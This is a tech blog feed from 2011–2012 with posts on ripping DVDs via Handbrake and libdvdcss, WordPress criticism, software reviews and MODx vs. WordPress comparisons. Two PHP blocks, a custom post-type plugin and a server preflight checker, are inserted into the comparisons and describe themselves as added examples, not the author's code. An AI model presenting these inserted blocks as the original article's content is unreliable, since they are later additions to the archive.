Software – Tech Tips, Reviews, Tutorials, Occasional Rants
Feed last updated Fri, 21 Mar 2014 05:03:09 +0000

How to Simply Rip DVDs in 64-bit Windows
Sun, 08 Jul 2012 22:33:41 +0000

In the past, we’ve looked at how to easily rip DVDs on the Windows platform. That method still works great, unless you’re on a 64-bit version of Windows. For those of us now running Windows 7 64-bit, we have a problem: DVD43, a required decrypter used in the previous tutorial, does not get along well with 64-bit versions of Windows.

The Solution – Handbrake with libdvdcss

There’s an easy solution to this problem, and it only requires the installation of one software program. I’ve migrated to the mighty Handbrake for all my DVD rips. First, install the 64-bit version of Handbrake. As of this writing, the latest version is 0.9.6.

With Handbrake installed, make a mental note of its installation location (probably C:\Program Files\Handbrake). Next, download the libdvdcss-2.dll file from Handbrake’s repository. Here’s a zipped copy of my working file (libdvdcss), just in case.

Take your copy of libdvdcss-2.dll and put it inside your Handbrake installation folder, as noted above. Finally, rename the file to libdvdcss.dll.

Handbrake folder with libdvdcss


Let’er Rip

You can now launch Handbrake and rip DVDs as usual. The full Handbrake guide is here, but one quick-and-dirty guide is to:

  • Choose your DVD from the Source button
  • Select your Title (you’re probably looking for the one with the longest duration – that’s the full video)
  • Pick a Destination for your ripped video file
  • Choose a Preset on the right side (I tend to stick with Regular – Normal)
  • Hit the big, green Start button, and let’er rip!
Handbrake - Main window

That should do it! You should now be able to decrypt and rip DVDs on Windows 7 64-bit. On a personal note, I’m impressed at how little time it takes to rip a full-length movie on modern hardware versus just a few years ago. I’m showing my age, but I fondly recall ripping DVDs using my beloved antique workhorse from 2001: an AMD 1600+ processor with 512 MB of DDR 133. Ripping a single DVD might have taken 8 hours or more! Today, it takes minutes. You kids today have no idea how lucky you are.

Okay, that’s enough nostalgia for this old timer. Get off my lawn, and I’ll get back to ripping my DVD collection. 🙂

How WordPress Destroyed the Internet
Tue, 10 Jan 2012 07:38:15 +0000

WordPress is so popular that it is taking over — it’s behind 22% of all new sites on the internet, but this sets a dangerously poor coding standard. Our infrastructure is crumbling!

Yes, this is a rant. My beef today is this: the WordPress manager might be easy to use, but under the hood, it sucks. There, I said it. It’s awful architecture and it has taught thousands of web developers that it’s Ok to write piss-poor code. This has single-handedly dumbed-down a whole generation of developers by setting a bad example. WordPress is the junk food of coding standards: ubiquitous, tastes good, but lacking any nutritional value.

I’ve ranted about WordPress before but what put me over the top today was the Suffusion Theme. It looks like a clean layout, so I thought I’d give it a try. Holy flaming monkey balls, was I in for a shock!

Suffusion Theme Options
Holy Smokes: The Suffusion Theme is not just a Theme

This theme not only has a metric-crap-ton of options, it also does the unthinkable: it allows you to register custom post-types and custom taxonomies. Does that sound like something else? Why, yes, it does: THAT, my friends, is A PLUGIN. Now, no offense to the theme’s author — it’s a clean interface and he obviously takes a lot of pride in his work — but this type of thing should never occur. A theme should never introduce extra functionality. What happens when you change the theme? Your whole site could collapse.

The conclusions that I have to draw about the architecture here are pretty negative: WordPress allows (or even encourages) the polluting of application layers in very unhealthy ways. It’s a very serious black mark for an application to allow a theme to get away with that. The view layer should be static: no logic, no functionality, it should merely determine how data is displayed.

This is hardly the end of the architectural infractions WordPress is guilty of, but it is perhaps one of the most obvious. I’d better leave it at that: the way WordPress is built allows for severe architectural flaws that make development difficult or impossible. Buyer beware.

Review of Web-based Project Management Software
Sat, 31 Dec 2011 05:00:52 +0000

Help! I gotta keep track of everything I gotta do! There is help available to track your projects, you just got to know where to look.

A lot of developers, designers, students, and even web-hobbyists have a lot of items on their to-do lists for any particular site or project. You have to remember to fix that one CSS glitch, or rewrite a page to use some new function… the lists can be long and daunting. If you’re like me, you’re likely to forget half the stuff you need to do, and if it weren’t for project management software, I might as well stay in bed.

To put it mildly, there are *a lot* of applications out there that help you track bugs and manage projects, and this article only looks at a handful of them. Although the general purpose of these web applications is similar, there are substantial differences in the pricing models, features, and usability, and hopefully this article will help you identify an application that is right for you. Or, if you’ve never really thought about using one before, maybe this article can help show you why project management / bug tracking software is good to have around.

This post only covers project management. I’ve discussed invoicing software in another post. Some of these packages include time-tracking and invoicing, but that’s just a “nice-to-have” for the purposes of this article.

DISCLAIMER: I am not affiliated with any of these companies. None of the links in the article text are affiliate links; I don’t get a kickback or commission on referrals, I’m merely sharing my opinions and experiences using the software in the hopes that it’ll help inform the decisions of others.

Here’s the list… some of these are hosted solutions (software-as-service), and some you have to download and install.


Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: This suite of Apps seems like they were hoping to get purchased by Google Apps… kinda similar, but more labored somehow.

My Intervals

Cheapest Option: Free

# Users: 4


Notes: You can get 1 project for free… but the functionality is limited.

Bit Bucket

Cheapest Option: Free

# Users: 5

Wiki?: yes

Notes: yet another solution…


Unfuddle

Cheapest Option: Free

# Users: 2

Wiki?: Yes, called “Notebooks”

Notes: This is one of my favorites for hosted solutions. I recommend Unfuddle — it’s not a silver bullet, but Unfuddle is a great tool for maintaining sanity: clean, simple, and easy to use. If you pay a little bit, you can unlock the best features.

Code Spaces

Cheapest Option: $3.99/mo

# Users: 2

Wiki?: yes

Notes: I felt the manager here was heavy… sorta Windowsy in a bad way, as in the interface needs to lighten up, but did have a good set of features.

Feng Office (Formerly OpenGoo)

Cheapest Option: $59/mo

# Users: unlimited

Wiki?: yes

Notes: this is a popular solution for its thoroughness — you have to install it on your servers, which is actually a good thing for people storing sensitive info.


Cheapest Option: Free

# Users: unlimited


Notes: This one you have to download and install on a server that runs PHP and MySQL — it includes features for sales teams. It’s built using the ATK framework.

Project Pier

Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: you gotta download and install this PHP/MySQL app. This is like the PHP cousin of Redmine, so if you don’t have the ability or resources to work with Ruby on Rails, this is a nice option.


Cheapest Option: Free

# Users: unlimited

Wiki?: Yes

Notes: This is a clean app — another one you have to download and install yourself. It’s a nice option (try the demo). The only thing I didn’t care for was that the app relies heavily on icons, so it’s hard to get your bearings. Good German engineering!


Cheapest Option: Free

# Users: Unlimited

Wiki?: Yes

Notes: This is my favorite. It’s not perfect, but it’s a clean interface and easy to navigate. The major downside is that you have to install this yourself. Can you install Ruby on Rails on your server? No? Then this might not be for you.


Cheapest Option: Free

# Users: unlimited, but only 1 project.

Wiki?: Yes

Notes: although this is a hugely popular hosted solution and it’s well integrated with many software projects, it does not have a good ticketing system, and it does not tie into code versioning (e.g. SVN), so I don’t fully comprehend its popularity. It’s pretty good, but it seems over-hyped.


Cheapest Option: $25/mo

# Users: unlimited

Wiki?: yes

Notes: This integrates with their Kiln product to tightly integrate bug tracking with code revisions. There’s another product Trello that does visual project organization, but to be honest, I’m kinda confused by these interrelated projects.

Pivotal Tracker

Cheapest Option: $7/mo (free for non-profits)

# Users: 3

Wiki?: sorta

Notes: This is a serious app from the boys in Boulder for agile development — they’ve really thought through the way that large projects should be managed. It’s a hosted solution, but they can install it on-site if needed.


Cheapest Option: Free (for open source), otherwise $15/mo

# Users: 10

Wiki?: yes

Notes: another clean app. This is a hosted solution.

Google Code

Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: This option is available ONLY for open-source projects. It’s clean, with an easy interface. Updating wiki pages and bugs seems to trigger errors not infrequently, but I recommend this for any open source project.


Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: A lot of projects use this (e.g. WordPress): You download and install it. It’s written in Python and can run on several common databases.


Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: It’s functional, but the UI/UX is pretty crusty. Sorry to pooh-pooh the hard work of the devs here, but I never felt like I could get clients to use this app… it’s a bit disjointed.


Cheapest Option: $10/mo

# Users: 10

Wiki?: Yes

Notes: This is popular with big corporations. The biggest disadvantage of this is that it’s HEAVY: you gotta have a rock-solid sysadmin to set up Tomcat on your server to install this behemoth.


Cheapest Option: Free

# Users: unlimited

Wiki?: no

Notes: this is a powerful Perl application used by Firefox that can be the public face of your app. You have to download and install this.


GitHub

Cheapest Option: Free

# Users: unlimited

Wiki?: Yes

Notes: this thing is on fire — GitHub is THE thing right now. Its wiki is a pain in the ass compared to Google Code when it comes to formatting special characters. Paid plans get private repos.

Hopefully that’s a good list to help you narrow down your choices. If that’s not good enough for you, check out Wikipedia’s comparison of issue tracking systems.

MODx vs. WordPress (revisited)
Sun, 25 Sep 2011 20:25:00 +0000

The last article I wrote about this topic was criticized as being heavy-handed in my complaints about WordPress, so in this article, I am revisiting the topic from the other side of the fence. There are things about WordPress that are great, and there can be many good reasons why you’d choose it as your Content Management System.

Ease of Updating

WordPress has done a fantastic job of making its product easy to use: each time there is a new version of WordPress, it takes only the click of a button to update your site. MODx still requires an FTP connection and an FTP client that can merge directories, otherwise, the upgrade can be hairy indeed. Unless you’ve got a really nice FTP client like Coda or you’ve got SSH access and you’re comfortable using cp -fr, then MODx can’t compete… MODx-ers will have to wait until version 2.2 or 2.3 when MODx will offer seamless upgrades.

WordPress also lets you easily upgrade all your plugins with a single click. MODx Revolution introduced package management, so you can see which plugins need updating, but it’s still not as streamlined as what WordPress offers.


Although WordPress at times is boneheaded and backwards in how its code is built, it is almost always extendible. MODx, especially Revolution, represents code that is much more mature. If you are a PHP hobbyist or even a junior-level developer, there’s a good chance that you won’t be able to follow the core MODx code because it’s so much more complex. MODx has areas that simply are not easily customizable — for example, the MODx manager is just flat-out hard to programmatically modify. At best, customizations of the MODx manager can be accomplished via configuration, but customizations via plugins can be complicated, and at worst, they may be impossible. The WordPress manager, by comparison, is nearly always customizable via one event or another, so with a working understanding of PHP, you can usually trick things out to how you want them. WordPress may be completely low-brow in how it implements certain functionality, but as long as you can find an appropriate action or filter to hook into, you can usually customize the dashboard to how you want it.

Some of the more-experienced readers might be raising an eyebrow here as I compare MODx and WordPress in this area, because the MODx architecture is built so much more sensibly, and because MODx is entirely object-oriented, it is by definition easier to override behaviors. But my point is that for “Joe Coder”, there are many tweaks that are simply easier to carry out in WordPress. It’s a bit like having a Volkswagen and a Jaguar in your garage: you can carry out most repairs on the VW with a wrench and a screwdriver, whereas the Jaguar requires special tools, experience, and patience.


WordPress’ manager is built using jQuery. The MODx Revo manager is built using Ext JS. Although Ext JS offers way more options when it comes to building an application, the experience of using the MODx manager is that it is sluggish and more difficult to customize due to the steeper learning curve. The WordPress manager may not represent the most mature architectural principles, and jQuery may be simplistic for certain uses, but WordPress is generally much faster to use — jQuery has a much lighter footprint so it loads more quickly and doesn’t require as many resources from your server.

Secondly, jQuery, like WordPress itself, is much more widely used than Ext JS. There are lots of jQuery plugins available and it’s generally easier to customize. No, jQuery isn’t going to be the end-all-be-all of your web application, and it isn’t going to scale well when you start demanding more and more complex user-interfaces, but it really fits the bill for a huge number of sites and interfaces.

Post Types

Any good content management system has to be able to store different types of content. In general, MODx is far better at this from an architectural and from a templating standpoint, but from the viewpoint of the average manager- or editor-user, WordPress generally makes more sense. MODx lets you define custom fields (called Template Variables in MODx parlance), and you associate them with a template. It makes good sense architecturally, but it is a bit… weird.

For example, you may create a “Book” template with custom fields for “Title”, “Author”, and “ISBN”. So the work flow in MODx is that you add a generically-named Document, then once you select the “Book” template, the “Title”, “Author”, “ISBN” custom fields appear, suddenly making the document a “Book” document. That works, but many users just don’t get it: they want to add a Book to their site. WordPress 3 allows for post types, which accomplishes just that — the built-in implementation is very primitive in comparison to MODx, but once it’s up and running, you won’t need to lecture your users about how a “Document will become a Book once you change the template”. If that explanation is confusing to you, then you can appreciate why WordPress’ implementation of this concept is easier to work with as an end-user. The Custom Content Type Manager plugin fixes many of these WordPress warts.
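The “Book” type above, done the way the earlier rant asks for: in a plugin rather than a theme, so the content outlives a theme switch. This is an added example, not code from the article, from the Custom Content Type Manager plugin, or from WordPress itself; the bpt_ prefix, the bpt_book slug and the _bpt_author/_bpt_isbn meta keys are invented, and the prefix is there because WordPress’s procedural API has no namespaces, so every plugin function shares one global name space.

```php
<?php
/*
Plugin Name: Book Post Type (added example)
Description: Registers a "Book" content type from a plugin, not a theme, so the
             books stay reachable when the theme changes. Not the article's code.
*/

// Refuse to run when requested directly instead of being loaded by WordPress.
if (!defined('ABSPATH')) {
    exit;
}

// 1. An action runs code at a point in the request and returns nothing.
//    register_post_type() must run on "init" on every request; WordPress does
//    not persist the registration.
function bpt_register_book_type()
{
    register_post_type('bpt_book', array(
        'labels'          => array(
            'name'          => 'Books',
            'singular_name' => 'Book',
            'add_new_item'  => 'Add New Book',
        ),
        'public'          => true,
        'has_archive'     => true,
        'supports'        => array('title', 'editor', 'thumbnail'),
        // Reuse the standard post capabilities; map_meta_cap lets WordPress
        // decide per Book whether this user may edit or delete it.
        'capability_type' => 'post',
        'map_meta_cap'    => true,
        'rewrite'         => array('slug' => 'books'),
    ));
}
add_action('init', 'bpt_register_book_type');

// 2. "Author" and "ISBN" become a meta box on the Book edit screen.
function bpt_add_meta_box()
{
    add_meta_box('bpt_book_details', 'Book Details', 'bpt_render_meta_box', 'bpt_book', 'side');
}
add_action('add_meta_boxes', 'bpt_add_meta_box');

function bpt_render_meta_box($post)
{
    $author = get_post_meta($post->ID, '_bpt_author', true);
    $isbn   = get_post_meta($post->ID, '_bpt_isbn', true);
    // The nonce ties the submitted form to this user and this screen.
    wp_nonce_field('bpt_save_book', 'bpt_nonce');
    echo '<p><label>Author<br><input name="bpt_author" value="' . esc_attr($author) . '"></label></p>';
    echo '<p><label>ISBN<br><input name="bpt_isbn" value="' . esc_attr($isbn) . '"></label></p>';
}

// 3. Save the fields: check the nonce and the user's capability, then
//    sanitize before anything reaches the database.
function bpt_save_book($post_id)
{
    if (defined('DOING_AUTOSAVE') && DOING_AUTOSAVE) {
        return;
    }
    if (get_post_type($post_id) !== 'bpt_book') {
        return;
    }
    if (!isset($_POST['bpt_nonce']) || !wp_verify_nonce($_POST['bpt_nonce'], 'bpt_save_book')) {
        return;
    }
    if (!current_user_can('edit_post', $post_id)) {
        return;
    }
    if (isset($_POST['bpt_author'])) {
        update_post_meta($post_id, '_bpt_author', sanitize_text_field($_POST['bpt_author']));
    }
    if (isset($_POST['bpt_isbn'])) {
        // Keep digits and the ISBN-10 check character "X" only.
        $isbn = strtoupper(preg_replace('/[^0-9Xx]/', '', $_POST['bpt_isbn']));
        update_post_meta($post_id, '_bpt_isbn', $isbn);
    }
}
add_action('save_post', 'bpt_save_book');

// 4. A filter, by contrast, receives a value and must return it. This one
//    appends the ISBN to a Book's rendered content on its own page.
function bpt_append_isbn($content)
{
    if (is_singular('bpt_book')) {
        $isbn = get_post_meta(get_the_ID(), '_bpt_isbn', true);
        if ($isbn !== '') {
            $content .= '<p class="bpt-isbn">ISBN: ' . esc_html($isbn) . '</p>';
        }
    }
    return $content;
}
add_filter('the_content', 'bpt_append_isbn');
```

Deactivating the plugin hides the Books from the manager but leaves the rows in wp_posts; deleting a theme that had registered the type would do the same, which is the trap the rant describes.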


Hopefully this article explains a bit more of WordPress’ strengths: it’s not the best solution for every project, but it can be the right choice for a lot of projects. I still have a long list of gripes about WordPress, but that doesn’t mean it doesn’t have its strengths.

Comparing Online Invoice Software
Fri, 22 Apr 2011 14:06:27 +0000

Following up on an article I wrote a couple years ago on Free Online Invoice Software, I wanted to write a blurb about paid online billing software. My business has grown, and I was spending more and more time dealing with invoices. So it was time for me to actually pay for the software that pays me. Seems kinda silly, doesn’t it? I was so uptight about spending money on software that actually pays me. So I spent a few hours with each of the programs below, and well… you can read about what I found.

FreshBooks
  • Price: $19.95/mo
  • Users: 1 (you); additional logins (e.g. for your accountant) @ $10/mo; clients can optionally be granted viewing privileges
  • Clients: 25
  • Projects: ???
  • Invoices: Unlimited

Harvest
  • Price: $12/mo
  • Users: 1 (you); additional logins (e.g. for your accountant) @ $10/mo
  • Clients: Unlimited
  • Projects: Unlimited
  • Invoices: Unlimited

Invoicera
  • Price: $9.95/mo
  • Users: 1 (you), plus 2 additional logins
  • Clients: 25
  • Projects: 25
  • Invoices: Unlimited

QuickBooks
  • Price: $12.95/mo
  • Users: 1 (you) + your accountant
  • Clients: Unlimited (?)
  • Projects: Unlimited (?)
  • Invoices: Unlimited (?)

* Sources: 1, 2, 3, 4


Freshbooks offers a very clean interface that made a lot of sense to me right off the bat. It was easy to add clients and recurring monthly expenses (holy %!**! I didn’t realize how much I was spending on server hosting!). It integrates right into my PayPal account, so when a client pays an invoice, POOF, that invoice automatically updates and marks itself as paid. I used to have to do that manually with BillingManager.

FreshBooks Menu

The price was a bit high for what I got, so I’m sorta waffling on that, but what really sold me on FreshBooks was the nice desktop timetracking software, ChronoMate. It’s $1/month more to use it, but I can clock stuff while working offline, then it syncs directly with my FreshBooks account, so I know (and my clients know) exactly how much time I’ve spent working on a project. Throw me a bone (affiliate link)

Harvest Invoices

Harvest is a solid application, and they are actively developing improvements. The menu organization here was also very similar to FreshBooks and Invoicera.

Harvest Menu

I have nothing but good things to say about Harvest: this is really a well-crafted application, and its pricing and features offer a superb value: unlimited Clients, Projects, and Invoices for all plans. They offer some really nice integrated time-tracking features, so I’m eyeing this very seriously: the ChronoMate integration with FreshBooks is pretty good, but it has some shortcomings that Harvest doesn’t have. I have to give a big tip of my hat to Matthew Lettini (one of? their Designer) for his detailed responses to my questions. Harvest gets massive bonus points for its commitment to good communication and taking their customers seriously, so if you want to work with a company that works with you, I don’t think you could ask for more.


Invoicera also offered a really nice application. It too offered a very similar set of menu options, and it was very easy to navigate. I can’t think of anything wrong with this software.

Invoicera Menu

It was easy to set up invoices, both one-offs and recurring. The expense management was a little bit confusing to me, but I got the sense that with a little bit more time spent using the software, it’d become really clear — they too were responsive to my questions about the software. The user interface was somewhere between Harvest’s and Freshbooks.

Probably the biggest draw here is what you get for the price: you and 2 additional users (e.g. your accountants) get logins for free with the default package. You have to pay for that with the other systems.


Originally I thought I would end up going with QuickBooks because I was already using its little brother: BillingManager. Wow… that was a bad assumption. All the simplicity and ease of use that was present in BillingManager was completely gone in QuickBooks… gone as in “scorched earth, salted ground.” The supposedly “automatic” transfer of data from BillingManager to QuickBooks was completely botched: half of my data from 2 years ago made it over, the rest… who knows. And nobody over there seemed to know what was going on. BillingManager was sort of treated like Intuit’s bastard child that nobody knew what to do with. It would have saved me time if they could have just deleted the partial data.

QuickBooks Menu

If you look at the menu closely, you can see that it’s WAY more complicated: QuickBooks offers features not offered by its competitors, but the price you pay is dealing with a wonky application and befuddled responses from the support hotline. To boot, most of the features that might justify this complexity (e.g. time tracking, integrations with online banking and credit card statements, and bill management) come only with the beefier packages starting at $24.95/month.

The biggest waste of time with QuickBooks is that they offer NO email support and NO public ticketing system of any kind (one of their pages says they offer email support, but their support staff said they didn’t, so who knows what’s going on there… they don’t even know it seems). Compare the time it takes you to fire off a 2 line email identifying your problem with the software to the time it takes to wait in the call queue and finally get transferred to someone who might know what you’re talking about. That’s lost money right there: your time, wasted. It made it worse that I’m living abroad while trying to set this up, so figuring out the time differences of when I could call them, and then paying international calling fees to wait in their call queue is just poor. I wouldn’t recommend using QuickBooks unless your accountant demands it.


This was really close: pretty much a three-way tie in many ways between FreshBooks, Harvest, and Invoicera. Look at their menus: they are all very similarly structured. Honestly, I think that Freshbooks, Harvest, and Invoicera are all great products, and I would have been happy using any of them. QuickBooks is the only one that annoyed the piss out of me: having a site that runs on pop-ups and forcing all their support requests to take place over the phone were just nails in their coffin. QuickBooks may be the “industry leader”, but I think they’re ripe for unseating because their site and their software were just painful to deal with. I wouldn’t be surprised to see a comment on this post asking me to “please give us a call to discuss”, but meh… I’ve spent too much time on the phone with them already.

WordPress vs. MODx
Tue, 19 Apr 2011 17:04:56 +0000

There are a lot of Content Management Systems (CMSs) out there, so I wanted to give a blow-by-blow analysis comparing two of them: MODx and WordPress. I feel oddly qualified to do so: Brian and I just authored a book on WordPress plugin development (WordPress 3 Plugin Development), and I am a MODx Solution Partner who was invited to speak at the MODxpo conference in Dallas last year. I’ve used both flavors of MODx (Evolution and Revolution) and WordPress while building somewhere around 50 web sites over the past couple years, and I like both systems. I have even contributed a couple plugins for both systems (e.g. Custom Content Type Manager for WordPress). So after the urging of some friends and colleagues (like Kris), I’m organizing my techno-ramblings into a coherent article.

I’m going to walk through a series of areas and compare and contrast how both CMSs work in those areas. The comments here apply to WordPress 3.x and (mostly) to MODx Revolution, but MODx Evolution is mentioned where appropriate.

Basic Stuff

System Requirements

WordPress 3.1 vs. MODx Revolution

Server OS
  WordPress 3.1: ???
  MODx Revolution:
  • Linux x86, x86-64
  • Windows XP
  • Mac OS X

Web Server
  WordPress 3.1:
  • Apache ???
  • NGINX ???
  MODx Revolution:
  • Apache 1.3.x or Apache 2.2.x
  • IIS 6.0+
  • Zeus
  • lighttpd
  • Cherokee

Database
  WordPress 3.1:
  • MySQL 4.1.20 or higher (5.0+ recommended)
  • MyISAM table types
  MODx Revolution:
  • MySQL 4.1.20 or higher (excludes 5.0.51)
  • Default table encoding of UTF-8
  • InnoDB and MyISAM table types

PHP Version
  WordPress 3.1: 4.3+ (5.2+ recommended)
  MODx Revolution: 5.1.1+ (excluding 5.1.6/5.2.0), with:
  • Running as FastCGI
  • safe_mode off
  • register_globals off
  • magic_quotes_gpc off
  • PHP memory_limit 24MB or more

PHP Modules
  WordPress 3.1: ???
  MODx Revolution:
  • zlib
  • JSON
  • cURL
  • ImageMagick
  • GD lib
  • PDO, with database driver
  • SimpleXML

*Source: WordPress requirements, MODx requirements

If the requirements for MODx Revo look insanely detailed, ask yourself this: “do you really want to be guessing whether or not your server will support a given app?” MODx Revo does a pretty good job of testing for the necessary requirements during installation, so you don’t have any unexpected surprises.
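The kind of test the installer runs, as an added preflight script that is neither the MODx installer nor anything from the article: it checks a server against the MODx Revolution rows of the table above, and the register_globals and safe_mode rows double as a hardening baseline, since a host still running with register_globals on fails here before any CMS goes in. The mx_ function names are invented; the MySQL version string is passed in as the first CLI argument because the script deliberately makes no database connection.

```php
<?php
// Added preflight check for the MODx Revolution requirements listed above.
// Not MODx's own installer code. Run via the CLI (php preflight.php 5.1.73)
// or drop it in the web root temporarily and remove it afterwards.

function mx_ini_is_on($name)
{
    // ini_get() returns false for directives that later PHP releases removed
    // (safe_mode, register_globals, magic_quotes_gpc), which counts as "off".
    $v = strtolower((string) ini_get($name));
    return in_array($v, array('1', 'on', 'yes', 'true'), true);
}

function mx_to_megabytes($limit)
{
    // memory_limit uses shorthand such as "128M" or "1G"; -1 means unlimited.
    $limit = trim((string) $limit);
    if ($limit === '-1') {
        return PHP_INT_MAX;
    }
    $num  = (float) $limit;
    switch (strtoupper(substr($limit, -1))) {
        case 'G': return $num * 1024;
        case 'M': return $num;
        case 'K': return $num / 1024;
        default:  return $num / (1024 * 1024); // plain byte count
    }
}

function mx_version_ok($have, $min, array $excluded)
{
    return version_compare($have, $min, '>=') && !in_array($have, $excluded, true);
}

// Returns label => bool for every row; $mysql_version is what SELECT VERSION()
// reported, supplied by the caller.
function mx_preflight($mysql_version = null)
{
    $checks = array();

    // PHP 5.1.1+, excluding 5.1.6 and 5.2.0 (values from the table).
    $checks['php version ' . PHP_VERSION] =
        mx_version_ok(PHP_VERSION, '5.1.1', array('5.1.6', '5.2.0'));

    // The three ini directives the table wants off.
    foreach (array('safe_mode', 'register_globals', 'magic_quotes_gpc') as $d) {
        $checks["$d off"] = !mx_ini_is_on($d);
    }

    // memory_limit 24MB or more.
    $mem = ini_get('memory_limit');
    $checks["memory_limit >= 24M (currently $mem)"] = mx_to_megabytes($mem) >= 24;

    // Running as FastCGI: only meaningful through the web server; the CLI
    // SAPI reports "cli" and will fail this row, which is expected.
    $sapi = php_sapi_name();
    $checks["running as FastCGI (sapi: $sapi)"] = strpos($sapi, 'cgi') !== false;

    // Required extensions; ImageMagick is exposed to PHP as "imagick".
    foreach (array('zlib', 'json', 'curl', 'gd', 'imagick', 'pdo', 'simplexml') as $ext) {
        $checks["extension $ext"] = extension_loaded($ext);
    }

    // "PDO, with database driver": the PDO core alone is not enough.
    $drivers = class_exists('PDO') ? PDO::getAvailableDrivers() : array();
    $checks['PDO mysql driver'] = in_array('mysql', $drivers, true);

    // MySQL 4.1.20+, excluding 5.0.51. Strip suffixes like "-log" first.
    if ($mysql_version !== null) {
        $base = preg_replace('/[^0-9.].*$/', '', $mysql_version);
        $checks["mysql version $mysql_version"] = mx_version_ok($base, '4.1.20', array('5.0.51'));
    }

    return $checks;
}

$results = mx_preflight(isset($argv[1]) ? $argv[1] : null);
$failed  = 0;
foreach ($results as $label => $ok) {
    printf("[%s] %s\n", $ok ? 'PASS' : 'FAIL', $label);
    if (!$ok) {
        $failed++;
    }
}
exit($failed > 0 ? 1 : 0);
```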


WordPress offers its “famous” 5-minute install, and I give them credit where credit is due: WordPress is a simple web app to install, but to be fair, installing MODx Evolution is also very straightforward.

MODx Revolution has beefier requirements, and it’s far more likely you’ll run into troubles setting up your webserver permissions or PHP extensions (e.g. PDO). Moving a Revolution install to a new server is also a tricky operation that requires some patience (see this how-to).


In short, WordPress and MODx Evolution are easily installed on practically any web server that supports PHP and MySQL. MODx Revo takes longer to install and configure and it requires a beefier server.


Hands down, MODx offers the gold standard in templating. Expression Engine is a healthy second place, but only in my days of doing Perl development with the venerable Template Toolkit did I encounter a templating system that followed good MVC architectural principles as well as MODx.

What does that mean? It means that if you’re a front-end designer who likes to roll your own HTML and CSS, then MODx will grant you total freedom to implement the designs you want, whereas WordPress may result in headaches and holes punched in your walls (no comment on the convoluted mess that is Drupal and Joomla templates). I’ve posted previously about creating templates in MODx Evolution and how to import existing layouts into MODx Evolution, and the process in MODx Revolution is nearly identical (the only difference is the format of the placeholders).

In MODx, you can easily have multiple templates (i.e. layouts), and use any one of them for any page. In WordPress, the ability to use a specific template is possible only with pages, not posts. The thing that really gives me convulsions is understanding how WordPress formats its special pages, e.g. a category page, or an author page. See the image below as a reference for how WordPress formats page requests.

WordPress Template Hierarchy

See the official WordPress docs for Template Hierarchy for more information. I honestly have a hard time fathoming that this is the solution that actually got implemented… what other crazy ideas were on the drawing board?


If having a specific HTML/CSS layout for your site is more than a “nice-to-have”, then MODx will save you many hours; the time to rework layouts in WordPress can be considerable and some of the PHP hacks are not trivial, whereas MODx templates are easy to create, modify, and maintain.


MODx offers nearly infinite menu flexibility through use of menu-generating PHP Snippets, primarily WayFinder, but it’s not aimed at the average user. WordPress has a built-in GUI for creating menus, but I have experienced some bugs with it when using custom content types. Your WordPress theme may not support more than one or two menus, so in the end you may end up writing some code in your templates (e.g. using my Summarize Posts plugin) so you can list the posts that you want to see.

In a nutshell, WordPress offers an easy GUI, but if you need more customization MODx’s flexibility here is far greater.


WordPress has a huge number of user-contributed plugins available, whereas MODx has relatively few. The sheer number is not a good comparison, however; I downloaded and tested hundreds of plugins in the process of writing my WordPress book, and the number of plugins that are unusable due to sophomoric errors or plain-old bad coding is huge. I estimate that at least half of the plugins in the WordPress repository are unusable, and perhaps only a tenth of them are worth using. There are crufty plugins in the MODx repo to be sure, but the playing field is more even than you might think.

The real difference here comes when you have to write your own code: MODx is a lot easier to work with, with a shorter learning curve for a majority of code, whereas learning the ropes of WordPress plugins requires more guidance (hey, did I mention we wrote a book about that?).


This is an area that is hard to discuss unless you’re a geek, but in a word, MODx offers a robust and well-architected MVC framework under the hood that can make writing custom plugins (Snippets, manager pages, et al) a breeze. The work done by Jason Coward and Shaun McCormick is really astounding.

Some of the limitations to WordPress are really staggering: it is basically a stateless application, so by default it does not use sessions, and nearly all of its API functions exist as procedural functions in the main namespace, so naming collisions are a big concern when authoring plugins. This makes certain functionality damn near impossible in WordPress. For example, creating a WordPress application with a login portal and access to custom data models would require an enormous amount of time. Even accessing WordPress’s posts and categories is difficult at times; I basically had to rewrite core WordPress functionality with another plugin (Summarize Posts) just to get the menus and summaries I needed for one recent site.

Another severe limitation of WordPress is that all extensions to the core occur via plugins that are triggered by system events (confusingly, they are loosely categorized into “actions” and “filters”). This construct can be awkward at times, and the WordPress architecture is showing its age as the number of events exponentially increases, whereas the amount of documentation for them continually wanes. Realistically you can get WordPress plugins to do just about everything you need using only a handful of events, but debugging someone else’s plugins is a nightmare: there is no centralized location listing which events are being hooked into, and new events are often created and executed on the fly. Debugging WordPress plugins is like Alice’s trip down the rabbit hole: majorly trippy, and you don’t know if you’ll ever come out.

User management is another area where MODx dwarfs WordPress: Revolution can handle totally granular control of permissions, but it is admittedly overly complex for 90%+ of use cases. Evolution offers a much more sensible permissions scheme that covers most use cases.

MODx offers much more sensible implementations of custom code: like WordPress it uses event-driven plugins, but it also uses custom PHP snippets which can be placed anywhere on a page or in a template.

Another impressive feat is how MODx Revolution has abstracted the database into a separate coding layer — that means it is relatively easy to interface with custom database tables (or even with other database engines) using code that is completely database agnostic (support for SQLite and PostgreSQL is in the works). That’s some seriously geeky stuff that has kept me awake at night trying to comprehend how they accomplished it. Microsoft has even worked directly with the MODx team because MODx’s architecture is flexible enough that it can run on an all-Microsoft stack (i.e. IIS and MS-SQL). I can’t think of a single other system that switch-hits as well as MODx.


If the site you are building is more of a web application that requires a lot of custom coding, go with MODx; the level of maturity in the underlying MODx framework is light years ahead of WordPress, but be advised that the coding in MODx is sometimes so advanced, it takes a very senior developer to understand what’s going on. If you decide to do a more serious application-type-project in WordPress, be sure to allocate extra time to augment or rewrite the core code. If you’re doing basic extensions or variations of a simple site/blog, then WordPress plugins can do that pretty well, so don’t overcomplicate things.


WordPress offers a clean manager dashboard for its administrators which relies on the jQuery JavaScript library to provide AJAX functionality and smooth user experience. It’s pretty easy to find your way around.

WordPress Manager dashboard

MODx underwent a huge change in its manager dashboard between Evolution and Revolution, and the Revolution dashboard is overwhelming for many. Evolution’s dashboard is cleaner and snappier.

MODx Evolution Dashboard

